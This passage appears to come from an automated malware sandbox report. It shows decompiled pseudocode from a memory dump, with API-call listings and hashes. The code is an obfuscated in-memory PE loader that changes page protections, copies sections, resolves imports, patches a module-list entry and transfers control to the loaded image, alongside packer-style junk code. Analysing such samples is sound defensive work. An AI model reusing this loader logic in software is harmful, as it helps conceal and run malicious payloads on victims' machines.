        				signed int _t385;
        				intOrPtr _t391;
        				signed int _t397;
        				void* _t401;
        				signed int* _t421;
        				void* _t439;
        
        				_v8 = 0xc6f8e435;
        				_v40 = 0xc6f8e434;
        				_v28 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_v12 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_t336 = _a28;
        				_v32 = _v32 ^ _v32;
        				_v32 = _v32 + 0xc6f8d435;
        				_v16 = _v16 ^ _v16;
        				_v16 = _v16 + 0xc6f8e475;
        				_v20 = _v20 ^ _v20;
        				_v20 = _v20 + 0xc6f8e409;
        				_v36 = _v36 ^ _v36;
        				_v36 = _v36 + 0xc6f96435;
        				_a28 = 0xc6f90e40;
        				if(_a4 == 0 || _a8 == 0 || _a20 == 0 ||  *_a4 != (_a28 ^ 0x00003c2b) + 0x27e2) {
        					L44:
        					return 0;
        				} else {
        					_v52 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        					_t262 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
        					_a8 = _t262;
        					if( *((intOrPtr*)(_t262 + 0x50)) == 0) {
        						goto L44;
        					}
        					_v48 = 0xc608e435;
        					_v48 = (_v48 ^ 0x2a823c2b) + 0x138527e2;
        					_t345 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x190)))) + 0x3c)) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x190))));
        					_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))));
        					_v12 = _t345;
        					_a28 = _t397;
        					if(_t397 == _t397) {
        						VirtualProtect(_a28,  *(_t345 + 0x50), (_v16 ^ 0x2a823c2b) + 0x138527e2,  &_v28);
        						E0245A4DE( *((intOrPtr*)(_v12 + 0x50)) -  *(_v12 + 0x54),  *(_v12 + 0x54) + _a28);
        						_t397 = _a28;
        					}
        					 *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x194)))) = _t397;
        					E0245A3D4(_t397, _a4,  *((intOrPtr*)(_a8 + 0x54)));
        					_t275 =  *((intOrPtr*)(_a28 + 0x3c)) + _a28;
        					_a20 = ( *(_t275 + 0x14) & 0x0000ffff) + _t275 + 0x18;
        					_a8 = _t275;
        					if(( *(_t275 + 6) & 0x0000ffff) == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        						L16:
        						_t352 = _a28;
        						if(_t352 !=  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
        							L19:
        							if(( *( *(_t336 + 0x1c8)) ^ 0x2a823c2b) + 0x138527e2 == 0) {
        								L31:
        								_t276 = E024595E0(_a28, _t275, _t336); // executed
        								if(_t276 != 0 && E02459539(_t336, _a28, _a8) != 0 && E02459412(_a8, _t336, _a28) != 0 && E024598C3(_a28, _t336) != 0) {
        									_t401 = _a28;
        									if(_t401 ==  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
        										VirtualProtect(_t401,  *(_v12 + 0x54), _v28,  &_v28);
        										_t401 = _a28;
        									}
        									if(( *( *(_t336 + 0x1c8)) ^ 0x2a823c2b) + 0x138527e2 == 0) {
        										_t290 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x28)) + _t401))(0); // executed
        									} else {
        										_t360 = _a8;
        										_a4 = 0xc6f8c435;
        										 *(_t360 + 0x16) =  *(_t360 + 0x16) | (_a4 ^ 0x00003c2b) + 0x000027e2;
        										_t290 =  *((intOrPtr*)( *((intOrPtr*)(_t360 + 0x28)) + _t401))(_t401, _a12, _a16);
        										 *((intOrPtr*)(_t336 + 0x1d0)) = 0xc6f8e434;
        									}
        									_v12 = _t290;
        									 *_a24 = _v12;
        									_v52 = 1;
        								}
        								L41:
        								if(_v52 == 0) {
        									_a28 = _a28 & 0x00000000;
        								}
        								return _a28;
        							}
        							_a4 = _a4 & 0x00000000;
        							_v24 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        							_v92 = 0xc6f8e4a7;
        							_v88 = 0xc6f8e4b9;
        							_v84 = 0xc6f8e4a9;
        							_v80 = 0xffffffffc6f8e4a1;
        							_v76 = 0xffffffffc6f8e4a1;
        							_v72 = 0xc6f8e435;
        							do {
        								_a4 = _a4 + 1;
        								 *((short*)(_t439 + _a4 * 2 - 0xc0)) = (0x00003c2b ^  *(_t439 + _a4 * 4 - 0x58)) + 0x27e2;
        							} while (_a4 < 6);
        							_v180 = 0xc6f8e4a9;
        							_v160 = 0xc6f8e4a9;
        							_v120 = 0xc6f8e4a9;
        							_v116 = 0xc6f8e4a9;
        							_v104 = 0xffffffffc6f8e4ba;
        							_v100 = 0xffffffffc6f8e4ba;
        							_v184 = 0xc6f8e441;
        							_v176 = 0xc6f8e4bb;
        							_v172 = 0xffffffffc6f8e44f;
        							_v168 = 0xc6f8e4ac;
        							_v164 = 0xc6f8e4a7;
        							_v156 = 0xc6f8e448;
        							_v152 = 0xc6f8e4a7;
        							_v148 = 0xc6f8e4b9;
        							_v144 = 0xc6f8e4bb;
        							_v140 = 0xc6f8e4bc;
        							_v136 = 0xffffffffc6f8e44f;
        							_v132 = 0xc6f8e4a6;
        							_v128 = 0xc6f8e4bb;
        							_v124 = 0xc6f8e474;
        							_v112 = 0xc6f8e4bb;
        							_v108 = 0xc6f8e4a8;
        							_v96 = 0xc6f8e435;
        							_t301 = 0;
        							do {
        								 *((char*)(_t439 + _t301 - 0xd8)) = ( *(_t439 + _t301 * 4 - 0xb4) ^ 0x0000002b) - 0x1e;
        								_t301 = _t301 + 1;
        							} while (_t301 < 0x17);
        							_t303 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x1d4)) + 4))( &_v196);
        							_v68 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x1d4)) + 8))(_t303,  &_v220);
        							 *_v68( *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c)))),  &_v24);
        							_v56 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        							_t312 = _v24;
        							if(_t312 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        								L30:
        								_t275 = _a8;
        								goto L31;
        							}
        							_v64 = _t312;
        							while( *((intOrPtr*)(_t312 + 0x18)) !=  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
        								_v24 =  *_t312;
        								_t312 = _v24;
        								if(_t312 == _v64) {
        									break;
        								}
        							}
        							if( *((intOrPtr*)(_t312 + 0x18)) ==  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
        								 *((intOrPtr*)(_t312 + 0x1c)) =  *((intOrPtr*)(_a8 + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x194))));
        								_v56 = (_v40 ^ 0x2a823c2b) + 0x138527e2;
        							}
        							goto L30;
        						}
        						if(VirtualProtect(_t352,  *(_v12 + 0x54), (_v20 ^ 0x2a823c2b) + 0x138527e2,  &_v28) == 0) {
        							goto L41;
        						}
        						_t275 = _a8;
        						goto L19;
        					}
        					_v44 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        					if(_v44 > ( *(_t275 + 6) & 0x0000ffff) - (_v40 ^ 0x2a823c2b) - 0x138527e2) {
        						goto L16;
        					}
        					_t421 =  &(_a20[2]);
        					_a20 = _t421;
        					while(1) {
        						_t319 =  *((intOrPtr*)(_t275 + 0x38));
        						_t385 = _t319 - 1;
        						_v60 = _t319;
        						_t320 =  *_t421;
        						if((_t320 & _t385) != 0) {
        							_t320 = (_t320 &  !_t385) + _v60;
        						}
        						E0245A4DE(_t320, _t421[1] + _a28);
        						_t322 = _a20;
        						_t388 =  *((intOrPtr*)(_t322 + 8));
        						if( *((intOrPtr*)(_t322 + 8)) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        							E0245A3D4( *((intOrPtr*)(_t322 + 4)) + _a28, _a4 +  *((intOrPtr*)(_t322 + 0xc)), _t388);
        							_t322 = _a20;
        						}
        						_t391 = _v44 + (_v40 ^ 0x2a823c2b) + 0x138527e2;
        						_a20 = _t322 + 0x28;
        						_t275 = _a8;
        						_v44 = _t391;
        						if(_t391 > ( *(_a8 + 6) & 0x0000ffff) - (_v40 ^ 0x2a823c2b) - 0x138527e2) {
        							goto L16;
        						}
        						_t421 = _a20;
        					}
        					goto L16;
        				}
        			}

        APIs
        • VirtualProtect.KERNELBASE(C6F90E40,?,C6F8E475,?,C6F8E435,138527E2,2A823C2B), ref: 02459B5F
        • VirtualProtect.KERNELBASE(C6F90E40,?,C6F8E409,?,?,?,?,C6F8E435,138527E2,2A823C2B), ref: 02459C86
        • VirtualProtect.KERNELBASE(C6F90E40,?,?,?,C6F90E40,?,C6F90E40,C6F8E475,C6F90E40,?,?,?,?,?,C6F8E435,138527E2), ref: 02459EC9
        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID: ProtectVirtual
        • String ID:
        • API String ID: 544645111-0
        • Opcode ID: 856d7f5dceadb80ed5ca52fbc45f4fc03b666cf5614beb3cf62ad064fe88862f
        • Instruction ID: 2998fcecede87065b041633550331ad619fa5a9a65b6919fd580a0112b92a09a
        • Opcode Fuzzy Hash: 856d7f5dceadb80ed5ca52fbc45f4fc03b666cf5614beb3cf62ad064fe88862f
        • Instruction Fuzzy Hash: 7E02D775A10219DFCB04CFA9C990AEEBBB5FF88314F14819AE849AB355D734D942CF90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E024595E0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
        				signed int _v8;
        				signed int _v12;
        				struct HINSTANCE__* _v16;
        				signed int _v20;
        				unsigned int _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				signed int _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				intOrPtr _t137;
        				signed int _t138;
        				intOrPtr* _t144;
        				struct HINSTANCE__* _t149;
        				intOrPtr _t168;
        				_Unknown_base(*)()* _t177;
        				signed int _t181;
        				signed int _t226;
        				signed int _t229;
        				CHAR* _t241;
        				intOrPtr _t242;
        				intOrPtr _t243;
        				intOrPtr _t252;
        				signed int _t280;
        
        				_t280 = 0xc6f8e435;
        				_v8 = 0xc6f8e435;
        				_v12 = 0xc6f8e434;
        				_v20 = 0xda3312bf;
        				_t137 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_v28 = _t137;
        				if((_v8 ^ 0x2a823c2b) + 0x138527e2 ==  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x190))))) {
        					L33:
        					_t138 = _v8;
        				} else {
        					_t241 = _a8;
        					if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _t241) {
        						goto L33;
        					} else {
        						_t242 =  *((intOrPtr*)(_t241 + 0x80));
        						if(_t242 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        							L32:
        							_t138 = _v12;
        						} else {
        							_t243 = _t242 + _a4;
        							_v48 = _t243;
        							while(1) {
        								_v20 = (_t280 ^ 0x2a823c2b) + 0x138527e2;
        								if(_v20 == _t280 ||  *((intOrPtr*)(_v20 * 0x14 + _t243)) == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        									goto L6;
        								}
        								L7:
        								_t144 = _v20 * 0x14 + _t243;
        								_v32 =  *((intOrPtr*)(_t144 + 0x10)) + _a4;
        								_v40 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        								_t252 =  *_t144;
        								_t226 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        								if(_t252 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        									_v40 = _t252 + _a4;
        								}
        								_a8 = (_v8 ^ 0x2a823c2b) +  *((intOrPtr*)(_t144 + 0xc)) + _a4 + 0x138527e2;
        								_v44 = 0xc6f8e408;
        								do {
        									_t149 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1d4))))(_a8);
        									_v16 = _t149;
        									if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _t149) {
        										_v16 = LoadLibraryA(_a8);
        									}
        									_v36 = 0x4e6662bc;
        									_v36 = 0xc6f8e02c;
        									if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _v16) {
        										_t226 = _t226 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
        										 *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1d4)) + 0x24))(((_v36 ^ 0x2a823c2b) + 0x138527e2) * _t226);
        									}
        								} while ((_v8 ^ 0x2a823c2b) + 0x138527e2 == _v16 && _t226 <= (_v44 ^ 0x2a823c2b) + 0x138527e2);
        								if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _v16) {
        									_v24 = 0xd87262bd;
        									_a8 = 0xdc804cbf;
        									_t229 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        									while( *(_v32 + _t229 * 4) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        										_v24 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        										_a8 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        										_t168 = _v40;
        										if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _t168) {
        											_v24 =  *((intOrPtr*)(_t168 + _t229 * 4));
        										}
        										_a8 =  *(_v32 + _t229 * 4);
        										if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _v24 || (_v8 ^ 0x2a823c2b) + 0x138527e2 == _v24 >> 0x1f) {
        											_t177 = GetProcAddress(_v16,  &(( &(_a8[_a4]))[2]));
        										} else {
        											_t177 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1d4)) + 8))(_v16, _v24 & 0x0000ffff);
        										}
        										_a8 = _t177;
        										_t181 = _v12;
        										if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _a8) {
        											 *(_v32 + _t229 * 4) = ((_t181 ^ 0x2a823c2b) + 0x138527e2) * _a8;
        										} else {
        											_v28 = _v28 + (_t181 ^ 0x2a823c2b) + 0x138527e2;
        										}
        										_t229 = _t229 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
        									}
        								} else {
        									_v28 = _v28 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
        								}
        								_t137 = _v28;
        								_t243 = _v48;
        								_t280 = _v20 - 0x138527e1 ^ 0x2a823c2b;
        								continue;
        								L6:
        								if( *((intOrPtr*)(_v20 * 0x14 + _t243 + 0x10)) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        									goto L7;
        								}
        								_t138 = _v8;
        								if(_t137 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        									goto L32;
        								}
        								goto L34;
        							}
        						}
        					}
        				}
        				L34:
        				return (_t138 ^ 0x2a823c2b) + 0x138527e2;
        			}

        APIs
        • LoadLibraryA.KERNELBASE(DC804CBF), ref: 0245971C
        • GetProcAddress.KERNELBASE(DC804CBF,C6F8E432), ref: 02459835
        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID:
        • API String ID: 2574300362-0
        • Opcode ID: 8a259e0db7e9a28644c2b88263d324da4db44ba3ef4d5c7c58744a7e52c520d1
        • Instruction ID: 52946bfd72f053e99c83926f4f4e6c203f65f472efed7712f153f6baba309d1c
        • Opcode Fuzzy Hash: 8a259e0db7e9a28644c2b88263d324da4db44ba3ef4d5c7c58744a7e52c520d1
        • Instruction Fuzzy Hash: 6EA1C875B10119DFCB04CF98C9D0AEEB7B2FF88304B59446AE956EB351D730AA41DB90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 33%
        			E02442699(intOrPtr* __eax, void* __edx, signed int __edi) {
        				char _v0;
        				signed int _v5;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				void* _v40;
        				signed int _v44;
        				signed int _v48;
        				intOrPtr _v52;
        				intOrPtr* _v56;
        				signed int _v60;
        				char _v64;
        				signed int* _t140;
        				signed int _t152;
        				signed int _t168;
        				intOrPtr _t169;
        				intOrPtr _t172;
        				intOrPtr _t184;
        				signed int _t185;
        				signed int* _t194;
        				signed int* _t195;
        				signed int _t197;
        				intOrPtr* _t205;
        				intOrPtr* _t214;
        				signed int _t217;
        				intOrPtr _t218;
        				void* _t227;
        				intOrPtr* _t228;
        				intOrPtr _t249;
        				signed int _t250;
        				signed int _t252;
        				signed int _t265;
        				signed int _t268;
        				signed int _t270;
        				intOrPtr _t278;
        				intOrPtr _t292;
        				signed int _t293;
        				void* _t297;
        				signed int _t299;
        				signed int* _t313;
        				signed int** _t322;
        				char* _t323;
        				intOrPtr _t326;
        				intOrPtr _t327;
        				intOrPtr _t328;
        				intOrPtr _t329;
        				intOrPtr _t334;
        				signed int _t337;
        				intOrPtr _t342;
        				signed int _t348;
        				signed int _t354;
        				intOrPtr _t361;
        				void* _t362;
        
        				_t362 = __edx;
        				asm("in al, dx");
        				asm("in eax, 0x72");
        				 *__eax =  *__eax + __eax;
        				_t140 =  *0x24492e0; // 0x19fde0
        				 *0x2449851 = 0x5958;
        				_v28 = 0xc6f8e435;
        				_v60 = 0;
        				 *0x24497f9 = __edi;
        				_v20 = 0xc6f8e434;
        				_push(__edi);
        				_v16 = 0xc6f8e679;
        				_v12 = _t140;
        				 *0x2449749 = __edi;
        				while(1) {
        					asm("sbb dword [0x2449795], 0x7c00");
        					if((_v16 ^ 0x2a823c2b) + 0x138527e2 == 0) {
        						break;
        					}
        					_v32 = _v16 * _v20;
        					 *0x244985d =  *0x244985d - 0x244983d;
        					asm("adc dword [0x2449849], 0x2449801");
        					_v44 = _v16 + _v28;
        					do {
        						 *0x244985d =  *0x244985d | 0x02449755;
        						RtlAllocateHeap(0); // executed
        						 *0x2449749 =  *0x2449749 | 0x02449801;
        					} while (IsCharAlphaNumericW(0x31) == 0);
        					_t152 = _v16;
        					 *0x2449845 = 0x3b0e;
        					_v60 =  &_v40;
        					_v24 = 0xc6f8e434;
        					 *0x2449815 = 0x1c6f;
        					_v44 = _t152;
        					 *0x2449801 = 0x5773;
        					_v32 = 0xc6f8e435;
        					 *0x2449755 = 0x75b3;
        					 *0x24491a0 = 0x2449028;
        					 *0x2449805 = 0x279e;
        					if(_t152 != 0xc6f8e5bc) {
        						 *0x244977d = 0xf85;
        						 *0x244980d = 0x67ac;
        						if(_t152 != 0xc6f8e514) {
        							L9:
        							 *0x2449801 = 0x55d9;
        							if(_v44 == 0xc6f8e41b) {
        								 *0x2449781 =  *0x2449781 - _t362;
        								_v40 = (_v24 ^ 0x2a823c2b) + 0x138527e2;
        							}
        						} else {
        							asm("sbb ecx, eax");
        							 *0x244973d = 0x2c3f;
        							_t361 =  *0x244942c; // 0x400000
        							 *0x244980d =  *0x244980d + 0x2449789;
        							 *0x2449841 = 0x2804;
        							if((_v32 ^ 0x2a823c2b) + 0x138527e2 == _t361) {
        								 *0x2449739 = 0x2449749 +  *0x2449739;
        								E02442F44(_t362, 0xc60001b8, _v32);
        								goto L9;
        							}
        						}
        					} else {
        						E024413C7( &_v40, _t362);
        						 *0x2449815 = 0x4b90;
        					}
        					asm("adc ecx, [0x2449839]");
        					 *0x244973d =  *0x244973d & 0x000000ff;
        					_t313 =  *0x2449871; // 0x2449845
        					 *0x24497c1 =  *0x24497c1 |  *_t313;
        					_v44 = _v40;
        					asm("sbb [0x2449739], edx");
        					 *0x2449785 = 0x5cc5;
        					asm("sbb dword [0x2449859], 0x5f55");
        					 *0x2449859 = 0x73ee;
        					if(_v44 == (_v20 ^ 0x2a823c2b) + 0x138527e2) {
        						asm("sbb [0x2449739], eax");
        						_t354 =  *0x2449855; // 0xd3d8a4ca
        						 *0x2449785 =  *0x2449785 ^ _t354;
        						 *0x244985d = 0x2d00;
        						 *0x2449739 =  *0x2449739 | 0x138527e2;
        						_v24 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        						_t168 =  *0x24492d0; // 0x19fdcc
        						 *0x24492d0 =  *0x24492d0 ^ _t168;
        						 *0x2449745 =  *0x2449745 + 0x4c42;
        						_t169 =  *0x24492d4; // 0x2440000
        						 *0x2449254 = _t169;
        						asm("sbb [0x2449781], ecx");
        						 *0x2449024 =  *0x24492d8;
        						_t172 =  *0x24492dc; // 0xe193d4a8
        						 *0x2449855 =  ~( *0x2449855);
        						 *0x2449274 = _t172;
        					}
        					asm("adc dword [0x24497cd], 0x62f2");
        					asm("sbb dword [0x24497d5], 0x24497c1");
        					 *0x2449785 =  *0x2449785 | 0x02449849;
        					 *0x2449809 =  *0x2449809 - 0x244983d;
        					 *0x244973d =  *0x244973d ^ 0x000036b8;
        					_v16 = (_v16 ^ 0x2a823c2b) - (_v20 ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
        				}
        				 *0x244973d =  *0x244973d ^ 0x0244984d;
        				_v56 = _v12;
        				asm("sbb eax, eax");
        				_t184 =  *0x24491a0; // 0x2449028
        				_v16 = 0xc6f8e435;
        				_v60 = 0xc6f8e465;
        				_t365 = 0xc6f8e434;
        				_v44 = 0xc6f8e434;
        				 *0x2449805 =  *0x2449805 | 0x00001f5f;
        				 *0x2449795 =  *0x2449795 | 0x02449785;
        				 *0x24497d1 = 0x3c4b;
        				if((_v44 ^ 0x2a823c2b) + 0x138527e2 ==  *0x2449024) {
        					L36:
        					_t185 = _v16;
        				} else {
        					_t43 = _t184 + 0x1c8; // 0x2449264
        					 *0x2449841 =  *0x2449841 + 0x3492;
        					_v60 = 0xc6f8e408;
        					 *0x2449859 =  *0x2449859 - 0x55f2;
        					_v5 = 0x85;
        					 *0x24497d5 =  *0x24497d5 - 0x6364;
        					 *0x2449745 =  *0x2449745 | 0x024497c5;
        					asm("adc dword [0x244985d], 0x2449789");
        					 *0x2449789 = 0x2098;
        					asm("adc dword [0x2449779], 0x65bc");
        					 *0x2449781 = 0x1a64;
        					if((_v16 ^ 0x2a823c2b) + 0x138527e2 == ( *( *_t43) ^ 0x2a823c2b) + 0x138527e2) {
        						goto L36;
        					} else {
        						asm("adc dword [0x2449791], 0x6fee");
        						asm("adc dword [0x2449801], 0x2449845");
        						_v24 = _v16;
        						 *0x2449855 =  *0x2449855 ^ 0x024497f9;
        						 *0x244984d =  *0x244984d - 0x24497f9;
        						 *0x244973d =  *0x244973d & 0x02449749;
        						_t227 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        						while(1) {
        							_t334 =  *0x24491a0; // 0x2449028
        							_t52 = _t334 + 0x194; // 0x2449204
        							_t292 =  *((intOrPtr*)( *_t52));
        							_t293 =  *(_t292 + 0x3c);
        							 *0x24497d1 = 0x5783;
        							if(_t227 >=  *((intOrPtr*)(_t293 + _t292 + 0x28))) {
        								break;
        							}
        							_t337 =  *0x2449849; // 0x7c7a
        							 *0x244980d =  *0x244980d + _t337;
        							_v24 = (_v24 ^ 0x2a823c2b) + 0x00000001 ^ 0x2a823c2b;
        							_t227 = _t227 + 1;
        						}
        						_t228 =  *0x244975d; // 0x244977d
        						 *0x244984d =  *0x244984d +  *_t228;
        						_v60 = _t365;
        						asm("adc ecx, [0x2449859]");
        						_t342 =  *0x24491a0; // 0x2449028
        						 *0x2449851 =  *0x2449851 + 0x2449741;
        						_t58 = _t342 + 0x194; // 0x2449204
        						 *0x2449789 =  *0x2449789 + 0x1acf;
        						 *0x244977d =  *0x244977d & 0x0244978d;
        						 *0x24492cc = (_v24 ^ 0x2a823c2b) +  *((intOrPtr*)( *_t58)) + 0x138527e2;
        						_v12 = 0x1e725789;
        						_v24 = 0xc6f8e455;
        						 *0x244983d = 0x1113;
        						 *0x244984d =  *0x244984d | 0x02449849;
        						 *0x2449861 =  *0x2449861 + 0x2449739;
        						_t348 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        						 *0x2449841 = 0x5ec5;
        						_v44 = _t348;
        						 *0x2449859 = 0x64a7;
        						if(_t348 < (_v24 ^ 0x2a823c2b) + 0x138527e2) {
        							_t66 = _t348 - 0x138527e2; // 0xb373be97
        							_t297 = (_t293 & 0x0000099c) + 0x414f;
        							_v20 = _t66;
        							do {
        								 *0x2449841 =  *0x2449841 - 0x2449861;
        								 *0x24497cd =  *0x24497cd + 0x138527e2;
        								_t299 =  *0x2449809; // 0x2009085
        								 *0x244974d =  *0x244974d | _t299;
        								 *0x2449815 =  *0x2449815 & 0x02449801;
        								_v12 = ((_v20 ^ 0x2a823c2b) * 0xdf41139d ^ 0xc6f8e08e) + _v12;
        								 *0x244983d =  *0x244983d + _t299;
        								_t249 =  *0x24492cc; // 0x4f41139d
        								_v52 = _t249;
        								asm("adc ebx, ebx");
        								_t250 = _v12;
        								_t365 = _t250 % 0xc6f8e408;
        								asm("sbb eax, [0x2449801]");
        								_t252 = _v20;
        								asm("adc dword [0x24497bd], 0x4ebe");
        								if(_t250 % 0xc6f8e408 == 0) {
        									asm("adc [0x2449755], edx");
        									_t365 = _v12;
        									 *0x2449839 = ( *0x2449839 & 0x000000ff) -  *0x2449809;
        									 *0x2449781 =  *0x2449781 + ( *0x24497c9 & 0x0000ffff);
        									 *0x2449849 =  *0x2449849 ^ _t365;
        									 *0x2449811 = 0x3142;
        									_v12 = (_t252 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 & _t365;
        								} else {
        									 *0x2449749 =  *0x2449749 - 0x4d1b;
        									 *0x24497bd =  *0x24497bd | 0x02449795;
        									_v12 = _v12 - ((_t252 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
        								}
        								asm("adc eax, ebx");
        								 *0x2449785 =  *0x2449785 - 0xdc8;
        								_t297 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        								 *0x24497d5 = 0x4d84;
        								 *0x2449801 = 0x2574;
        								if(_t297 < (_v24 ^ 0x2a823c2b) + 0x138527e2) {
        									_t84 = _t297 - 0x138527e2; // 0xb373be97
        									 *0x2449815 =  *0x2449815 ^ 0x00001809;
        									_v32 = _t84;
        									do {
        										 *0x2449861 =  *0x2449861 - 0x138527e2;
        										asm("adc [0x2449745], ecx");
        										_t265 = _v32 ^ 0x2a823c2b;
        										_v48 = _t265;
        										asm("sbb dword [0x24497b9], 0x73b9");
        										_v12 = _v12 - (_t265 * 0xc601139d ^ 0xc6f8d08e);
        										_t268 = _v12;
        										_t365 = _t268 % 0xc6f8e408;
        										_t270 = _v20;
        										if(_t268 % 0xc6f8e408 == 0) {
        											_v12 = (_t270 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 & _v12;
        										} else {
        											_v12 = _v12 - ((_t270 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
        										}
        										if(_v48 == 0xc6f8e465) {
        											_t278 =  *0x24491a0; // 0x2449028
        											_t101 = _t278 + 0x194; // 0x2449204
        											 *_v56 = _v52( *((intOrPtr*)( *_t101)),  *0x2449024,  *0x2449274);
        										}
        										_t297 = _t297 + 1;
        										_v32 = _v32 + 1;
        									} while (_t297 < (_v24 ^ 0x2a823c2b) + 0x138527e2);
        									_t348 = _v44;
        								}
        								_t348 = _t348 + 1;
        								_v20 = _v20 + 1;
        								_v44 = _t348;
        							} while (_t348 < (_v24 ^ 0x2a823c2b) + 0x138527e2);
        						}
        						 *0x2449218 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        						 *0x2449220 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
        						_t185 = _v60;
        					}
        				}
        				_v24 = (_t185 ^ 0x2a823c2b) + 0x138527e2;
        				_v24 = _v24 - 0x138527e2 ^ 0x2a823c2b;
        				_t321 = _v28;
        				if(_v28 != _v24) {
        					_t322 =  *0x24492e0; // 0x19fde0
        					_t194 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        					 *_t322 = _t194;
        				} else {
        					_t195 =  *0x244901c; // 0x2449438
        					_v36 = _v36 & 0x00000000;
        					_v36 = _v36 |  *_t195;
        					_t197 =  *0x24492c4; // 0xc7e310bf
        					_v60 = _t197;
        					_v60 = 0xc6f8e475;
        					_v44 = 0xc6f8e408;
        					_v5 = 0x85;
        					_t205 =  *0x24491c0; // 0x2449428
        					E02442209(_t321, _t365, 0x138527e2,  *_t205, 0x2449116, 1, 4); // executed
        					_t323 =  *0x24492c8; // 0x2442646
        					 *_t323 = (_v5 ^ 0x0000003f) + 0x2f;
        					_t326 =  *0x24492c8; // 0x2442646
        					_t327 =  *0x24492b8; // 0x24590b3
        					_t328 =  *0x24492c8; // 0x2442646
        					 *((intOrPtr*)(_t328 + 1)) = 0xec7ad81e - (_v44 ^ 0x2a823c2b) - _t326 + _t327;
        					_t214 =  *0x24492b8; // 0x24590b3
        					 *_t214( *0x2449358,  *0x2449254,  *0x2449024,  *0x2449274, _v36,  *0x24491a0,  *0x24492c8, (_v44 ^ 0x2a823c2b) + 0x138527e2, (_v60 ^ 0x2a823c2b) + 0x138527e2,  &_v64);
        					 *0x24492d0 =  &_v0;
        					_t217 =  *0x24492d0; // 0x19fdcc
        					_t329 =  *0x2449218; // 0x2040000
        					 *_t217 =  *_t217 + _t329;
        					_t218 =  *0x24491a0; // 0x2449028
        					_t137 = _t218 + 0x1cc; // 0x2449440
        					_t194 =  *0x24492e0; // 0x19fde0
        					 *_t194 =  *_t194 |  *( *_t137);
        				}
        				return _t194;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02442736
        Memory Dump Source
        • Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp
        Similarity
